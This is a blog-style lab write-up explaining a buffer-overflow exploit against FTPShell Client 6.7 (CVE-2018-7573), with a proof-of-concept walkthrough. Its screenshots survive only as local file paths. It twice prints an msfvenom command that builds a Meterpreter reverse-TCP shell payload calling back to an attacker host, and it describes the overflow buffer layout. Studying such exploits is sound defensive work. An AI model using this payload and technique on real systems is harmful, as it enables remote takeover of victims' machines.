FTPShell Client 6.7 - Buffer Overflow Exploit Code Analysis and Exploitation | Lucideus

Overview 
This exploit code below is written in python language. The exploit basically makes an FTP server on the host machine and the target machine connects with the host through its IP. When the target and host machines are connected, the host sends a buffer to the target and gets the shell of the victim to perform remote code execution.

Code Analysis:


In the above part of the code, two python modules are imported using keyword import that is socket and sys. The sys module provides access to some variables used or maintained by the interpreter and to functions that interact strongly with the interpreter. The socket module provides the feature of socket programming in python that is a way of connecting two nodes on a network to communicate with each other. A variable port is declared which stores value 21.
Here but is variably used to store the shellcode produced with the help of msfvenom. The msfvenom command used to generate the shellcode is:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.153 LPORT=4444 -f python -b '\x00\x22\x0d\x0a'


Payload used here is windows/meterpreter/reverse_tcp to get reverse tcp connection of victim’s machine. LHOST is the IP of the host machine and LPORT is the port to listen on.

In this part of the code, there are two blocks try and except. 

If there is no exception, then only try clause will run, except clause is finished. Firstly the try block will be executed in which we made a socket instance and passed it two parameters. The first parameter is AF_INET and the second one is SOCK_STREAM. AF_INET refers to the address family ipv4. The SOCK_STREAM means connection-oriented TCP protocol. A server has a ‘bind’ method which binds it to a specific IP and port so that it can listen to incoming requests on that IP and port. Here we have typed “0.0.0.0” in the IP field this makes the server listen to requests coming from other computers on the network.

A server has a ‘listen’ method which puts the server into listening mode. This allows the server to listen to incoming connections. Here we put the socket in listening mode. Here 5 in ‘s.listen(5)’ means that 5 connections are kept waiting if the server is busy and if a 6th socket tries to connect then the connection is refused. If the try block is executed without any error a message will be displayed that “FTP server started on port: 21”.

If an exception occurred, try clause will be skipped and except clause will run and message displayed is “Failed to start the server on port: 21”


In this part, four variables are declared. The variables eip, nops and junk store the values as displayed above and the variable payload store the combined values of nops, buf, junk and eip.

At last, a forever while loop is started which executes until we interrupt it or an error occurs. The server has an ‘accept’ method that initiates a connection with the client. The socket must be bound to an address and listening for connections. 

The return value of ‘s.accept()’ is a pair ‘conn, addr’ where conn is a new socket object usable to send and receive data on the connection, and address is the address bound to the socket on the other end of the connection. Server socket doesn’t send any data and it doesn’t receive any data. It just produces “client” sockets. Each ‘conn’ is created in response to some other “client” socket doing a ‘connect()’ to the host and port we’re bound to. As soon as we’ve created that ‘conn’, we go back to listening for more connections. 

Now data is sent through sockets using ‘conn.send()’ and received from sockets using ‘conn.recv()’ and displayed. 1024 in ‘conn.recv(1024)’ shows the maximum amount of data to be received at once in the communication. Finally, the payload is sent from ‘conn.send()’ in the last line to get the reverse shell.

                                                                Exploitation 

PUBLISHED: 2018-05-08
CVE: CVE-2018-7573
AUTHOR: r4wd3r
Description
This exploit basically makes an FTP server on the host machine and the target machine connects with the host through its IP. When the target and host machines are connected, the host sends a buffer to the target and gets the shell of the victim to perform remote code execution. Original shellcode present in the exploit executes 'calc.exe' on the target machine, using msfvenom we have generated a payload so that we can get remote access as shown in this poc.

Lab Environment
Target Machine: Windows 7 x64 (with FTPShell Client 6.7 installed)
Attacker Machine: Kali Linux 2018.1

Proof Of Concept
  • Download FTP Shell Client 6.7 and install it on windows 7 machine.
  • Setup Metasploit
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-25-42.png

Setting up payload to be delivered onto the victim machine.

Msfvenom command to produce required shell code :
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.153 LPORT=4444 -f python -b '\x00\x22\x0d\x0a'
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-26-11.png

Setting localhost IP (LHOST) for the payload and local port (LPORT) to listen on.

C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-26-52.png

Starting the exploit
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-27-46.png

Starting FTP client application on the victim machine
C:\Users\ANAS AHMAD\Desktop\ftp_client\Windows 7 x64-2018-06-25-14-28-51.png

Starting up ftp server on host machine
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-28-03.png

Connecting to host machine.
C:\Users\ANAS AHMAD\Desktop\ftp_client\Windows 7 x64-2018-06-25-14-29-04.png

Attack is launched and shell is acquired.
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-29-24.png

Exploring directories remotely on victim machine.
C:\Users\ANAS AHMAD\Desktop\ftp_client\kali 18.1-2018-06-25-14-29-35.png

No comments:

Powered by Blogger.